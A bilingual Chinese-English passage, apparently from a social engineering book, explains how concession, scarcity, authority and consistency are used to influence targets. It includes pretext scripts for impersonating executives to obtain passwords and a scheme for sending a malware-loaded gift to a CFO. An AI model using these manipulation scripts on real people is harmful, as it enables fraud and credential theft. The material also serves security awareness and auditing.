例如,可以采用这种方法,向公司的 CFO 发送一件技术产品,可能是装有恶意软件的 iPod。当他收到礼物时,他有义务将其插入。我看到的一种成功的攻击方式是,社交工程师向 CFO 或 CEO 发送一份小礼物,并附上一张卡片,上面写着:“请接受我们公司的一份小礼物。我们只要求您在www.products.com上浏览我们的产品,并在www.products.com/catalog.pdf上下载我们的 PDF 目录。我下周会给你打电话。”

This method can be used, for example, by sending the CFO of a company a piece of technology, maybe an iPod loaded with malicious software. When he gets the gift he is obligated to plug it in. One successful attack vector I saw in play was where the social engineer sent a small relevant gift to the CFO or CEO with a card that said, “Please accept a small gift from our company. All we ask is that you browse our products at www.products.com and download our PDF catalog here at www.products.com/catalog.pdf. I will call you next week.”

 

此方法每次都成功。

This method was successful every time.

 

让步

Concession

 

让步或让步行为被定义为“承认或承认”或“屈服行为”。让步经常在社会工程学背景下使用,作为对人类互惠本能的戏仿。人类似乎有一种内在的功能,使他们想要“以己度人”。社会工程师可以使用“一物换一物”的想法或“你帮我,我帮你”的原则。

A concession, or the act of conceding, is defined as “an acknowledgment or admission,” or “the act of yielding.” Concessions are used often within the social engineering context as a play on the reciprocation instinct of humans. Humans seem to have a built-in function that makes them want to “do unto others as they do unto” you. A social engineer can use the “something for something” idea or the “I’ll scratch your back if you scratch mine” principle.

 

让步以及如何正确使用让步有一些基本原则:

There are basic principles to concessions and how to use them properly:

 
 
     
  • 标明你的让步:让对方知道你何时让步、让步什么,这样你的目标就很难忽视回报的冲动。这需要平衡,因为你不想在宣布让步时大肆吹嘘,但一个简单的声明,如“好的,我同意你这个”,或“我会和你妥协”,表明你愿意让步。
  • Label your concessions: Make it known when and what you are conceding, which makes it difficult for your mark to ignore the urge to reciprocate. This will take balance because you don’t want to blow a trumpet, so to speak, while you announce a concession, but a simple statement like, “OK, I’ll give you this one,” or “I will meet you halfway,” show you are willing to concede.
  •  
     
  • 要求并定义互惠:你可以从种下互惠的种子开始,这会增加你得到回报的机会。开始种下这些种子的一个简单方法是通过非语言交流来表明你是灵活的,并且是一个好的倾听者。这些小事可以在你的目标中建立回报的感觉时产生很大的影响。
  • Demand and define reciprocity: You can start by planting the seeds of reciprocation and this increases your chances of getting something in return. An easy way to start planting these seeds is through nonverbal communication showing that you are flexible, and also by being a good listener. These little things can make a big difference when building feelings of reciprocation in your target.
  •  
     
  • 做出有条件的让步:当信任度较低或需要表明您已准备好做出其他让步时,您可以使用“无风险”让步。我的意思是,这种让步不会伴随着“现在你可以为我做点什么”的态度。通过让步目标想要或需要的东西,而没有反要求,您可以与目标建立非常牢固的联系。
  • Make contingent concessions: You can use “risk-free” concessions when trust is low or when you need to signal that you are ready to make other concessions. What I mean by this is a concession that does not come with a “now you can do something for me” attitude. By giving in to something the target wants or needs with no counter demand, you can build a very strong bond with the target.
  •  
     
  • 分阶段做出让步:互惠互利的观念深深植根于我们的心中。大多数人认为,如果有人帮了他们一个忙,那么他们最终会得到社会契约的回报。同样,如果有人做出让步,比如在谈判或讨价还价协议中,那么人们也会本能地感到有义务“让步”一点。既然这是事实,你不必觉得你的所有让步都必须一次性做出。你可以“分阶段”做出让步,随着时间的推移,在这里让步一点,在那里让步一点,以保持你的目标回报。
  • Make concessions in installments: The idea of reciprocity is deeply ingrained in our minds. Most people feel that if someone does them a favor then they are socially contracted to eventually return that favor. Similarly, if someone makes a concession, say in a negotiation or bargaining agreement, then one instinctively feels obligated to “budge” a little bit, too. Since this is a fact, you do not have to feel that all your concessions must be at one time. You can make “installments” with your concessions, where you give in a little here and a little there over time to keep your target reciprocating.
  •  
 

销售人员、谈判人员和社会工程师每天都会使用让步。成功的社会工程师可以利用和滥用这种本能倾向,不仅可以抵制他人对他们施加的操纵,还可以试图完全控制局面。让步和回报技巧与本书讨论的许多其他社会工程技术配合得很好。

Concessions are used daily by salespeople, negotiators, and social engineers. A successful social engineer can use and abuse this instinctual tendency by not only resisting the manipulations being placed on them by others but also by trying to take over the situation completely. Concession and reciprocation skills play well with many of the other social engineering techniques discussed within the pages of this book.

 

举个例子,电话推销员打电话要求捐款,可以说明有多少人会屈服于让步。他们使用一种策略,在某人第一次有机会拒绝大额请求后,获得让步。同一个请求者提出一个较小的要求,你更有可能接受这个较小的要求,而不是大额请求。

An example of how many people fall for concessions can be illustrated with telemarketers who call for donations. They use a strategy for gaining concessions after someone is first given the opportunity to turn down a large request. The same requester counteroffers with a smaller request that you are more likely to accept than the large request.

 

大请求:“您能向我们的慈善机构捐赠 200 美元吗?”

Large request: “Can you donate $200 to our charity?”

 

回答:“不,我不能。”

Response: “No, I cannot.”

 

较小的请求:“哦,先生,很抱歉,我明白。您能只捐 20 美元吗?”

Smaller request: “Oh, I’m sorry sir, and I understand. Can you donate only $20?”

 

不知道这种技术的人可能会感觉身上的负担减轻了,他们意识到他们只需花费 20 美元,而不是最初的要价 200 美元。

People who are not aware of this technique might feel like the burden is taken off of them and realize they can part with a mere $20 rather than the initial asking price of $200.

 

另一个很好的例子出现在David Hill 撰写的一篇文章中(http://ezinearticles.com/?How-to-Negotiate-the-Salary-Using-the-Power-of-the-Norm-of-Reciprocity&id=2449465 ):

Another great example appeared in an article (http://ezinearticles.com/?How-to-Negotiate-the-Salary-Using-the-Power-of-the-Norm-of-Reciprocity&id=2449465) written by David Hill:

 

在大多数讨价还价的情况下,都能感受到这一规范的力量。假设买家和卖家正在就汽车的价格讨价还价。卖家的出价为 24,000 美元。买家认为这个出价无法接受,并出价 15,000 美元。现在,卖家将出价降至 20,000 美元,即做出了让步。在这种情况下,买家通常会倾向于提高出价,可能提高到 17,000 美元。买家之所以会有这种倾向,是因为存在互惠规范。现在,这一规范要求买家以另一个让步来回应卖家的让步。

The power of this norm can be felt in most bargaining situations. Assume a buyer and a seller are haggling over the price of a car. The seller starts out with a bid at $24,000. The buyer finds this offer unacceptable and makes a counter bid at $15,000. Now, the seller lowers his bid to $20,000, i.e., he makes a concession. In this case, the buyer will most often feel inclined to increase his bid, maybe to $17,000. The reason why the buyer will feel this inclination is because of the presence of the norm of reciprocity. This norm now demands that the buyer responds to the seller’s concession with another concession.

 

正如迄今为止讨论的大多数原则一样,让步必须对接受者有价值。你不能让步只对你有价值的东西,否则你将失去通过好的让步获得的力量。

As with most of the principles discussed so far, the concession must be valuable to the receiver. You can’t concede something that is valuable only to you or you lose the power you gain with a good concession.

 

作为一名社会工程师,不要做出让你丢面子、失去信任或失去地位的让步,这也是至关重要的。让步和你与目标的立场之间必须存在微妙的平衡,找到这种平衡是成功的一半。然而,找到这种平衡,让步就可以成为你手中非常重要的工具。

As a social engineer, not giving a concession that will cause you to lose face, rapport, or your position is also imperative. A delicate balance must exist between the concession and your standing with the target, and finding it is half the work. Find it, though, and concessions can be a very serious tool in your hands.

 

缺乏

Scarcity

 

如果物品和机会稀缺、稀缺或难以获得,人们通常会觉得它们更有吸引力。这就是为什么你会看到报纸和广播广告充斥着“最后一天”、“限时”、“仅 3 天促销”和“永远停业”等信息,吸引人们从四面八方赶来购买即将再也见不到的产品。

People often find objects and opportunities more attractive if they are rare, scarce, or hard to obtain. This is why you will see newspapers and radio ads filled with “Last Day,” “Limited Time Only,” “Only 3-Day Sale,” and “Going Out of Business Forever” messages that entice people to come from all over to get a share of the soon-to-be-never-seen-again product.

 

在销售环境中,稀缺性的运用最为著名的口号是“立即行动!供应有限!”其他技巧包括常见的“前 X 位致电者可获得免费小部件”,或故意减少畅销产品的供应。最近,这种做法最普遍的指控是任天堂 Wii。Gamasutra 的作家 Jason Dobson 表示:“但我认为 [任天堂] 故意减少供应,因为他们完成了全年的销售目标。新年从 4 月 1 日开始,我认为我们将看到供应量激增”(www.gamasutra.com/php-bin/news_index.php?story=13297)。

The use of scarcity in the sales context is best known with the catch phrase “Act now! Supplies are limited!” Other techniques are the common “The first X callers get a free widget,” or having an intentional short supply of a popular product. In recent times, this practice was most popularly alleged with the Nintendo Wii. Jason Dobson, a writer for Gamasutra, said, “But I think [Nintendo] intentionally dried up supply because they made their numbers for the year. The new year starts April 1, and I think we’re going to see supply flowing” (www.gamasutra.com/php-bin/news_index.php?story=13297).

 

在我居住的地方,一家汽车经销商在周四刊登了一则广告,称由于新库存到货,他们必须处理掉 X 辆汽车。价格非常低,而且有些汽车——等一下——已经不再生产,而那个周末是有史以来最后一个可以进来了解汽车销售历史的周末。

Where I live, a car dealership ran an ad on a Thursday stating it had to get rid of X number of cars due to new stock arriving. The prices were so low and some of the cars—wait for it—were no longer being produced, and that weekend was the last weekend ever that you could come in for a piece of auto-selling history.

 

那个周末销量暴涨,所以促销结束了,对吧?不,那个广告每周四播出,持续了三个多月。我经常想知道为什么人们没有注意到,但这家经销商用这种方法卖出了很多车。

The sales went through the roof that weekend, so the sale was over right? Nope, that ad ran every Thursday for more than three months. I often wondered how people just didn’t catch on to it, but the dealership sold a lot of cars using this method.

 

如果引入稀缺性,社交活动通常会显得更加排他。在这种情况下,参加这些活动的感知社会效益通常会增加。在广告中,这一点可以通过音乐活动广告得到体现,这些广告指出上一场音乐会的门票很快就售罄了。

Social events can often appear to be more exclusive if scarcity is introduced. The perceived social benefit of attending these events often goes up in these circumstances. In advertising, this point is driven home with ads for music events that point out how the last concert was quickly sold out.

 

众所周知,许多受欢迎的餐厅会关闭部分区域,以显得比实际更忙。这些餐厅非常受欢迎的印象通常会激发人们到该餐厅就餐的强烈欲望。要查看真正提到使用稀缺性来推广活动的广告,请访问www.social-engineer.org/wiki/archives/Scarcity/Scarcity-Advertisment.html

Many popular restaurants have been known to close off sections of the restaurant to appear busier than they really are. The perception that they are extremely popular can often trigger a heightened desire to eat at that establishment. To see an ad that actually mentions the use of scarcity in promoting an event, go to www.social-engineer.org/wiki/archives/Scarcity/Scarcity-Advertisment.html.

 

这则广告充分利用了稀缺性的四个主要要素:

This ad played on four major components of scarcity:

 
 
     
  • 此次发布是有限度的访问。
  • The launch is limited access.
  •  
     
  • 该应用程序不公开且仅限部分用户使用。
  • The application is not public and only limited.
  •  
     
  • 发起人都是经过精挑细选且名额有限的。
  • Promoters are handpicked and limited.
  •  
     
  • 对于那些有幸被选中参加的人来说,电子书是免费的。
  • The e-book is free to those lucky enough to be chosen to come.
  •  
 

所有这些观点都利用了稀缺性,让潜在的派对参与者感到参加这项活动非常困难,只有精英、少数人和骄傲的人才能有机会踏上那片神圣的土地。

All of these points use scarcity by making the would-be partygoers feel that getting into this event is so difficult that only the elite, the few, and the proud can even have a remote chance of stepping foot onto that hallowed ground.

 

经济学的基础是分配具有替代用途的资源。这种分配是由分配对象的稀缺性决定的。资源越稀缺,对象的感知价值就越高。正是这种稀缺性使得黄金比盐更值钱,而盐又比粘土更值钱。

The basics of economics are made up of the allocation of resources that have alternative uses. This allocation is driven by the scarcity of the objects that are being allocated. The rarer the resource, the higher the perceived value the object retains. This rarity is why gold is worth more than salt, which is worth more than clay.

 

此外,在日常交往中,稀缺性也经常被使用。稀缺性可以被引入社交场合,以试图使某人拥有的东西升值。例如,一个人可能表现得像他平时很忙,很难有空闲时间。这种行为可能会让他不花时间陪伴他有义务陪伴的人,同时让他度过的时间看起来更有价值。

Also, within daily interactions scarcity is often used. Scarcity can be introduced into social situations in an attempt to make something one has go up in value. For instance, one might act like he is very busy on a regular basis, and free time is hard to come by. This action may excuse him from not spending time with someone he may have an obligation to spend time with, and at the same time make time that is spent seem that much more valuable.

 

你也可以利用稀缺性来操纵注意力。想想有多少人抱怨商店里的销售人员在不缺乏销售人员注意力的情况下打扰他们,然而,当他们的注意力稀缺时被销售人员忽视时,他们也会同样感到不安。总的来说,人们被驱使去渴望那些难以获得的东西,因为它被认为更有价值。注意力也是如此。

You can manipulate attention through the use of scarcity as well. Think of how many people complain about salesmen bothering them in a store when there is no scarcity of salespeople’s attention, yet they are just as upset when they are ignored by salespeople when their attention is scarce. On the whole, people are driven to desire that which is hard to obtain, because it is viewed as having more value. This holds true for attention as well.

 

稀缺性通常用于社会工程学,以在决策环境中营造一种紧迫感。这种紧迫感通常会导致操纵决策过程,从而使社会工程师能够控制提供给受害者的信息。这通常是通过结合使用权威和稀缺性原则来实现的。例如,说这样的话:“首席财务官史密斯先生在长周末离开之前给我打电话,让我过来修复他的电子邮件问题。他说他厌倦了崩溃,希望在周一之前修复它。”这在营造紧迫感的同时还营造了稀缺性,因为首席财务官无法交谈,时间是稀缺的物品。

Scarcity is often used in social engineering contexts to create a feeling of urgency in a decision-making context. This urgency can often lead to manipulation of the decision-making process, allowing the social engineer to control the information provided to the victim. This is done commonly by using a mixture of authority and scarcity principles. For example, saying something like, “The CFO, Mr. Smith, called me before he left for the long weekend and told me to come down and fix his email problem. He said he was sick and tired of the crashes and wanted it fixed before Monday.” This creates urgency alongside scarcity in that the CFO is not available to speak to and time is the scarce item.

 

将稀缺性与其他原则相结合,也可以使攻击更加致命。无论哪种方式,稀缺性都会产生欲望,而这种欲望可能会导致某人做出日后可能会后悔的决定。

Using scarcity mixed with other principles can also make the attack even deadlier. Either way, scarcity creates a desire and that desire can lead someone to making a decision he might regret later.

 

最近,一辆卡车驶入我的车道,后面有一台冰柜,这证明了这一点。这位衣着得体的年轻人向我妻子走来,解释说他是一名肉类销售员。他负责给顾客送肉,正要回办公室时,看到她在院子里干活。他开始谈论肉价,以及店里的东西有多贵。我的妻子是一个非常注重价格的购物者,所以这建立了融洽的关系。此外,他有着非常悦耳的南方口音,称呼她为“女士”,非常尊重她。

This was proven to me recently when a truck pulled into my driveway with a freezer in the back. This decently dressed young man approached my wife and explained that he is a meat salesman. He delivers meat to customers and was just about to head back to the office and saw her working in the yard. He began talking about meat prices and how expensive things are in the store. My wife is a very price-conscious shopper, so this built rapport. Plus he had a very pleasant southern accent and called her “ma’am” and was very respectful.

 

交谈几分钟后,她脱口而出一个通常会让销售员哑口无言的问题:“你要多少钱?”

After a few minutes of talking, she blurts out the question that usually stops salesmen dead, “How much do you want?”

 

他毫不犹豫地说道:“听着,我整天都在以每箱 400 美元的价格卖这些东西,但这是我的最后一箱了。我很乐意带着空冰箱回到办公室,同时给你一些高质量的肉。”

Without missing too much of a beat he says, “Listen, I have been selling these all day for $400 per box, but this is my last box. I would love to just go back to the office with an empty freezer and give you some high-quality meat in the meantime.”

 

哦不,最后一个盒子!他告诉过她,他每两个月才来一次。愿望已经提出来了,但我的妻子并不傻。她知道她被操纵了。她找了个借口来接我。

Oh no, the last box! He told her before he only comes through once every two months. The desire has been raised, but my wife is no dummy. She knew she was being manipulated. She excused herself and came to get me.

 

他滔滔不绝地讲着,大肆渲染食物的稀缺性。当然,这种类型的账户可以成为如何避免落入这种策略的教训。问题是情绪会卷入其中。他看到我有一个看起来用过的户外烤架,所以他知道我喜欢在户外做饭,他利用了这一点。然后他谈到了肉的质量,并迅速将其与餐馆的质量和他的盒子里的东西进行了比较。

He went through his spiel and laid on the scarcity thick. Of course, this type of an account can be a lesson on how to not fall for this tactic. The problem is that emotion gets involved. He sees that I have a grill outside that looks used, so he knows I love to cook outside and he plays on that. He then talks about the quality of meat and quickly makes comparisons to restaurant quality and what is in his boxes.

 

许多人很容易被他推销的感情所蒙骗。“如果这是他最后一次了怎么办?”“他说得对,这比出去吃饭便宜多了。”“他来找我……我甚至不用开车去商店。”

Many people could easily fall for the emotional aspect of his sales pitch. “What if it is his last one?” “He is right, this is much cheaper than eating out.” “He comes to me…I don’t even have to drive to the store.”

 

相反,我拿出计算器,问他最后两箱的价格,除以重量,然后问我妻子,她通常在店里每磅买 Delmonico 或肋眼牛排要多少钱。当她给出的价格每磅低了 3 美元时,我只是闭嘴了。现在他的情绪开始发挥作用。他拼命挽回面子。他立即降价 150 美元。我再次计算,他每磅仍然多付了 0.5 美元。

Instead, I whipped out a calculator and asked him for the amount for the two last boxes, divided by the weight and then asked my wife how much she normally pays per pound for a Delmonico or ribeye in the store. When her price came in lower by $3.00 per pound I simply just shut up. Now his emotions get involved. He scrambles to save face. He lowers his price by $150 off the bat. I again do the math and he is still $.50 more per pound.

 

他试图谈论质量、便利性以及所有值得多花 50 美元的方面。我改变了姿势和位置,远离他并表现出不感兴趣。他什么也没说,在说完一通乏味的长篇大论后就停了下来,并提出再给我 50 美元的折扣。我告诉他,“对不起,我觉得不值得。”

He tries to talk about quality, convenience, and all those aspects that make it worth the $.50 more. I shift my posture and position to be away from him and to show disinterest. Without saying anything, he trails off at the end of a weak spiel and offers me another $50 off. I tell him, “Sorry, I just don’t think it’s worth it.”

 

然后他犯了一个典型的错误,表明他关于稀缺性的说法是错误的——他更加屈服了。“你愿意为这些盒子付多少钱?”

He then does the classic mistake that shows how his claims of scarcity were false—he caves in more. “How much do you want to pay for these boxes?”

 

“我可能可以捐100美元。”

“I probably could do $100.”

 

“如果你能给我 125 美元,我们就成交了。”

“If you can give me $125 we can call it a deal.”

 

请注意,不久前他的肉售价为每箱 400 美元,而且他们是该地区两三个月内最后两箱肉。这本应是一场竞价战,但我却让他带着两箱肉走了,没有现金。

Now mind you a little bit ago he was at $400 per box and they were the last two in this area for two to three months. This should have been a bidding war for that value, but instead, I sent him packing with his two boxes of meat and no cash.

 

这个故事给社会工程师的教训是,要使稀缺性发挥作用,它要么是真实的,要么你必须坚持己见来营造出真实的假象。

The lesson in this story for social engineers is that for scarcity to work it either has to be real, or you have to stick to your guns to give the appearance of reality.

 

当人们真正需要某样东西时,他们会认为它的价值更高。一个恶意的例子是卡特里娜飓风过后,石油公司提高了燃料价格。他们声称由于破坏,燃料短缺,导致价格大幅上涨。当然,如果这是真的,那么燃料的价值会比现在高得多;相反,这是一个利用稀缺性来赚钱的例子。然而与此同时,当英国石油公司的错误导致数百万加仑的石油流入墨西哥湾,破坏了生态系统时,燃料价格并没有因为供应不足而暴涨,而是下跌了。这是怎么回事?好吧,我不想在这里讨论这个问题,但它证明了一个观点,即要使稀缺性发挥作用,它必须是可信的,而这正是石油公司失败的地方,也是社会工程师失败的地方。

People will perceive the value higher when something is really in need. A malicious example of this is how the petrol companies raised the prices of fuel after Hurricane Katrina. The claim was that fuel was in shortage due to the destruction, which caused terrible price increases. Of course, if this were true then the fuel would be worth a lot more than it is; instead it was an example of the claim of scarcity used to make money. Yet at the same time, when BP’s error caused millions of gallons of oil to be lost in the Gulf of Mexico, ruining the ecosystem, instead of fuel prices skyrocketing due to lack of supply, they dropped. How? Well I won’t get into that here, but it proves the point that for scarcity to work, it has to be believable, and this where the oil companies fail and where social engineers can fail, too.

 

从社会工程师的角度来看,机会越有限或越难获得,它对人们的价值就越大。如果信息被视为私密、受限制且难以获得,而你愿意与他人分享,那么在他们眼中,你就获得了很大的价值。

From a social engineer’s standpoint, the more limited or difficult it is obtain an opportunity the more value it will have to people. If information is deemed as private, restricted, and hard to come by, and you are willing to share it with someone, you have just gained a lot of value in their eyes.

 

社会工程师可以利用信息的稀缺性,通过使用这样的说法:“我不应该这么说,但是……”或“我不确定你是否听到过这个消息,但我无意中听到了……”这些用低声说出的话暗示这些信息是稀缺的。

A social engineer can leverage scarcity with information by using a statement like, “I am not supposed to be saying this but…” or “I am not sure if you heard this news, but I overheard…” Statements like these spoken in hushed tones imply that this information is scarce.

 

权威

Authority

 

人们更愿意听从他们视为权威的人的指示或建议。找到一个有足够自信直接质疑权威的人并不常见,尤其是当权威对他有直接权力或与他面对面时。

People are more willing to follow the directions or recommendations of someone they view as an authority. Finding a person who has enough assertiveness to question authority directly, especially when that authority holds direct power over him or is face-to-face with him is uncommon.

 

例如,孩子们被教导要服从老师、辅导员、牧师和保姆等成年人,因为他们对他们有权威。通常,质疑权威被视为不尊重,而绝对服从才是值得奖励的。这些原则延续到成年人的生活,因为我们被教导要尊重权威人物,不要质疑那些我们认为是权威的人给我们下的规则或命令。

Children, for example, are taught to obey adults such as teachers, counselors, priests, and nannies because they have authority over them. Often, questioning authority is deemed as disrespectful and abject obedience is what is rewarded. These principles carry over into adult life because we are taught to respect authority figures and not question rules or orders given to us by those whom we deem authorities.

 

不幸的是,正是这一原则导致许多儿童落入虐待者和骚扰者的手中。当然,不仅仅是这一原则,那些以儿童为猎物的人意识到儿童是如何被灌输权威观念的,并经常寻找那些看起来更顺从的人。同样,恶意的社会工程师也利用这一原则操纵他们的目标采取一些可能导致违规的行动或不行动。

Unfortunately, it is this principle leads many children into the hands of abusers and molesters. Of course, not this principle solely, but those who prey on children realize how children are taught about authority and often seek out those who appear to be more compliant. Similarly, malicious social engineers use this principle to manipulate their targets to take some action or inaction that can lead to a breach.

 

从社会工程的角度理解权威是如何被运用的非常重要。德国社会学家和政治经济学家马克斯·韦伯将权威分为几类,我对其进行了调整,使其更贴近社会工程的范畴。

Understanding how authority is used from a social engineering aspect is important. German sociologist and political economist, Max Weber, defined authority into categories that I have adapted to fit more closely into the realm of social engineering.

 

法律权威

Legal Authority

 

法律权威基于政府和法律。这通常适用于执法人员或执行您当前所在土地、地区或设施法律的其他人员。

Legal authority is based upon government and law. This generally applies to law enforcement officers or others who enforce the laws of the land, area, or facility you are presently in.

 

作为社会工程师,以执法人员或其他政府官员为借口通常是非法的。但是,保安、银行保安或其他类型的执法机构人物可以很好地代表并经常被社会工程师使用。

As a social engineer, pretexts that involve law enforcement or other government officials are usually illegal. However, security guards, bank security, or other types of enforcement authority figures can be well represented and are often used by social engineers.

 

在英国广播公司的电视节目《The Real Hustle》的一集中,保罗·威尔逊和他的同伙们打扮成收钱的保安。当有人穿着与真人相似的制服出现,并表现得像一个普通的权威人士时,目标几乎没有理由怀疑冒名顶替者就是他“声称”的那样。扮演权威人物是社会工程师进入公司的主要手段。

In one episode of the BBC television program The Real Hustle, Paul Wilson and his cohorts dressed up like the guards who collect the money. When someone shows up in the uniforms that look similar to the real ones and acts as a normal person in that authoritative position would act, targets have little reason to doubt the imposter is who he “says” he is. Acting as an authority figure is a major ploy used by social engineers to gain access to a company.

 

另一种有效的伎俩是假扮为寻求特定信息的律师。扮演一个普遍受大众恐惧或尊敬的角色是使用法律权威伎俩的一种方式。

Another ploy that can be effective is posing as a lawyer who is seeking certain information. Playing a role that is generally feared or respected by the masses can be one way a legal authority ploy is used.

 

组织权威

Organizational Authority

 

组织权力很简单,就是通过组织定义的任何权力。通常,这指的是监督层级。组织中处于权力位置的人比处于层级底层的人拥有更多的权力和获取更多信息的渠道。

Organizational authority is quite simply any authority defined by means of an organization. Typically, this refers to a supervisory hierarchy. Someone within a position of power in an organization has more power and access to more information than someone at the bottom of the hierarchy.

 

在社会工程审计中,顾问可能会冒充 CIO 或其他具有明确组织权限的人员。然后,顾问可能会从服务台或任何其他可能认为被冒充人员对其有权限的员工那里获取密码或其他信息。

In a social engineering audit, a consultant may impersonate the CIO or someone else with clearly defined organizational authority. The consultant may then be able to obtain passwords or other information from the help desk or any other employee who may perceive that the impersonated person has authority over him or her.

 

美国司法部的 Jonathan J. Rusch 在题为“互联网欺诈的‘社会工程学’”的论文中写道:“在适当的情况下,人们很可能对权威的主张做出高度反应,即使声称处于权威地位的人并没有亲自在场”(www.isoc.org/inet99/proceedings/3g/3g_2.htm)。

In a paper entitled “The ‘Social Engineering’ of the Internet Fraud” Jonathan J. Rusch of the U.S. Department of Justice writes, “People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present” (www.isoc.org/inet99/proceedings/3g/3g_2.htm).

 

此策略还有其他用途,比如不假装自己是 CFO,而是 CFO 派来或授权的。在目标眼中,名字和头衔所拥有的权力可能足以让攻击者拥有这种权力。

This ploy is used in other ways, by not acting as if you are the CFO, but instead sent or authorized by the CFO. The authority the name and title wields may be enough to grant that power to the attacker in the eyes of the target.

 

拉什引用了罗伯特·西奥迪尼 (Robert B. Cialdini) 进行的一项实验,并记录在他的著作《影响力》 (1993) 中,该实验表明,来自三家不同医院的 22 个护士站的 95% 的护士都愿意根据一名自称是护士从未见过的医生的研究人员打来的电话,给患者注射危险剂量的药物。

Rusch cites an experiment performed by Robert B. Cialdini and recorded in his book Influence (1993), which showed 95 percent of nurses within 22 stations from three different hospitals were willing to administer patients a dangerous dose of medication based upon a phone call from a researcher purporting to be a physician the nurses had never met.

 

这个实验清楚地表明,基于命令和感知到的权威概念,人们可能会不顾自己的判断而采取某些行动。这种权威可以而且经常被用来利用公司泄露有价值的数据。

This experiment clearly shows that based upon orders and the perceived notion of authority, people might take certain actions despite their better judgment. This type of authority can and is often used to exploit companies into giving away valuable data.

 

社会权威

Social Authority

 

社会权威是指任何社会群体的“天生领导者”。社会群体可以由同事、大学朋友或任何其他人群组成。

Social authority refers to the “natural-born leaders” of any social group. A social group could consist of co-workers, college friends, or any other gathering of people.

 

《影响力》一书中,西奥迪尼写道:“当人们以自动的方式对权威做出反应时,往往倾向于对权威的象征做出反应,而不是对其实质做出反应。”

In Influence, Cialdini writes, “When reacting to authority in an automatic fashion there is a tendency to often do so in response to the mere symbols of authority rather than to its substance.”

 

要产生社会权威,可能不需要花费大量的时间或结构来定义权威人物。在任何情况下,社会认同的快速闪现(人们受到一群采取相同行动的人的影响)可能有助于为一个人提供社会权威。

For social authority to occur, an extraordinary amount of time or structure may not be needed to define an authoritative figure. In any setting, a quick flash of social proof, where people are influenced by a group of people taking the same action, may help provide a person social authority.

 

在社会工程中,社会权威可以发挥优势,即向目标索要或施压以获取信息。如果目标拒绝,从而不受群体领导者的青睐,那么整个群体就会对其失去好感。服从领导者的社会权威被认为是有利的。

Social authority can be used to an advantage in social engineering by asking or pressuring the target for information. If the target refuses and is therefore not liked by the leader of the group, the target may fall out of favor with the entire group. Complying with the leader’s social authority is perceived to be advantageous.

 

当直接说明或暗示先前的人或团体对攻击者提出的问题做出了反应时,社会权威的运用就成功了。“昨天,首席财务官派我来处理这个问题,乔让我通过了,他检查了我的所有凭证,他把它们存档了吗?”像这样的简单陈述利用了几种权威形式。

Social authority is successfully used when either directly stated or implied that a previous person or group reacted the way that the attacker is asking. “Yesterday the CFO sent me down to take care of this problem and Joe let me through and he checked all my credentials, did he put them on file?” A simple statement like that utilizes a few forms of authority.

 

如果你盲目地服从权威,你可能会对权威的象征做出反应,而不是对现实做出反应。在西方国家,三种权威象征特别有效——你可以用其中任何一种来奖励人们的服从(而不是其他权威证据):

If you comply with authorities mindlessly, you may respond to symbols of authority rather than to reality. Three authority symbols are particularly effective in Western countries—you may reward people with any one of these (and no other evidence of authority) for their compliance:

 
 
     
  • 标题
  • Titles
  •  
     
  • 衣服
  • Clothes
  •  
     
  • 汽车
  • Automobiles
  •  
 

在我对哈佛大学心理学家、说服力和影响力研究员艾伦·兰格博士进行的一次采访中(www.social-engineer.org/episode-007-using-persuasion-on-the-mindless-masses),她广泛讨论了无意识问题。她表示,人们通常在没有太多思考的状态下完成大部分工作;换句话说,他们处于自动驾驶状态。在这种情况下,滥用权威角色是非常危险的。感知到的权威会让处于自动驾驶状态的人无限制地做出反应。

In an interview I conducted with Dr. Ellen Langer, Harvard psychologist and researcher of persuasion and influence (www.social-engineer.org/episode-007-using-persuasion-on-the-mindless-masses), she talked extensively about mindlessness. She stated that people often do much of their work in a state where there is not much thought; in other words, they are in autopilot. In those positions, the abuse of the authority role is very dangerous. Perceived authority can make someone on autopilot react without limits.

 

对于许多社会工程师来说,使用合适的衣服、肢体语言,甚至印制一张假名片,都能够呈现出权威的立场,让他们的目标保持自动化。

Using the right clothes, body language, and even having a fake business card printed has worked for many social engineers in presenting an authority stance and keeping their targets in autopilot.

 

除了本文概述的权威形式,社会工程师还可能使用其他形式的权威,但这些是最常用的。权威在影响他人方面是一种强大的力量,只要稍加推理和收集信息,社会工程师就可以有效地利用权威借口来为自己谋利。

Other forms of authority may come into play for a social engineer than the ones outlined here, but these are the most commonly used. Authority is a powerful force when it comes to influencing others, and with a little bit of reasoning and information gathering a social engineer can effectively use an authority pretext to his or her advantage.

 

承诺与一致性

Commitment and Consistency

 

人们重视他人的一致性,也希望自己的行为保持一致。一般来说,人们可能希望自己的言语、态度和行为保持一致。一致性减少了重新处理信息的需要,并为复杂的决策提供了捷径。

People value consistency in others, and they also want to appear consistent in their own behavior. Generally people probably want their words, attitudes, and deeds to be consistent and congruent. Consistency reduces the need to reprocess information and offers shortcuts through complex decisions.

 

直觉——根据过去的经验,你感觉到某个行为是好是坏、是对是错的那一刻——通常表明你正在做出的决定可能违背了先前的感觉和信念。这些信号通常表明你感到被迫同意一些你不想要的东西。

Gut feelings—those moments where you sense that an action is good or bad, or right or wrong, based on past experience—are often indicators that a decision being made might be against previously committed feelings and beliefs. These signals often indicate that you feel pushed to agree to something that you don’t want.

 

做出承诺时,直觉也会发挥作用。直觉可能表明你不确定自己的承诺是否错误。你可以问自己:“如果我知道现在的情况,如果我能再次做出承诺,我会做出同样的承诺吗?

Gut feelings can also occur when it comes to making commitments. Gut feelings may indicate that you are uncertain of whether your commitment was a mistake. You can ask yourself, “Knowing what I now know, if I could do that again, would I make the same commitment?

 

在了解社会工程师如何利用一致性来获得某人的承诺之前,先看看三个可能有助于说明这一点的例子。

Before looking at how a social engineer can use consistency to gain someone’s commitment, take a look at three examples that might help hit this point home.

 
 
     
  • 营销:公司经常花费巨额资金来获得市场份额。虽然没有真正的回报,但他们努力保持他们认为有利可图的市场份额。可口可乐和百事可乐是数十年来利用营销来保持知名度的典范,但商业广告往往不会说服人们从百事可乐转向可口可乐。由于这两家公司一直“致力于”相互竞争,因此当其中一家推出新产品或营销理念时,另一家似乎也不会落后太多。
  • Marketing: Companies often spend extraordinary amounts of money to gain market share. There is no real return, but they fight to remain in that share that they believe to be profitable. Coca-Cola and Pepsi are great examples of using marketing throughout the decades in the fight to remain visible, yet often a commercial will not sway a person to switch from Pepsi to Coke. Because the two companies have been “committed” to the war against each other it seems that when one of them comes out with a new product or marketing idea, the other is not too far behind.
  •  
     
